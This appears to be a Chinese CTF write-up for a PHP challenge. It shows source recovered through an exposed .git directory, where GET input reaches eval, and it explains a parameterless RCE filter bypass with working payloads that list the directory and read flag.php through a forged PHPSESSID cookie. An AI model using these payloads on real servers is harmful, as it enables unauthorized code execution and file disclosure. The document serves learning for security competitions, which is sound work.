首先用githack扫一波,获得源码.
<?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) { // echo $_GET['exp']; @eval($_GET['exp']); } else{ die("还差一点哦!"); } } else{ die("再好好想想!"); } } else{ die("还想读flag,臭弟弟!"); } } // highlight_file(__FILE__); ?>
可以看到,题目中有@eval($_GET['exp']);
,在一般情况下我们可以直接用其getshell,但由于此处的第二个if:if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))
导致我们如果使用了参数便无法通过正则校验.这是典型的无参数RCE.(正则中的?R
表示引用当前表达式,后面加上?
递归调用.)而该正则只允许以下格式的函数:
a(b());
/a();
,而a('xxx');
这样的使用了参数的形式则不被允许.
回到题目,首先我们要做的就是查看目录.scandir读当前目录并返回结果的代码:print_r(scandir('.'));
但是由于不能使用参数所以还要用上:current(localeconv())
来取代scandir('.')
中的.
(参考简析GXY_CTF “禁止套娃”无参数RCE)
于是将上述所说整合,payload为:?exp=print_r(scandir(current(localeconv())));
可以看到页面回显:
flag在哪里呢? Array ( [0] => . [1] => .. [2] => .git [3] => flag.php [4] => index.php )
直接访问无法获得flag.php的内容,这里可以用PHPSESSID来操作.
利用工具添加名为PHPSESSID的cookie,令其值为flag.php.然后用?exp=print_r(session_id(session_start()));
显示PHPSESSID的内容,即flag.php这一字符串.
最后用highlight_file()获取flag.php的内容.
最终payload:?exp=highlight_file(session_id(session_start()));
获得flag.
No responses yet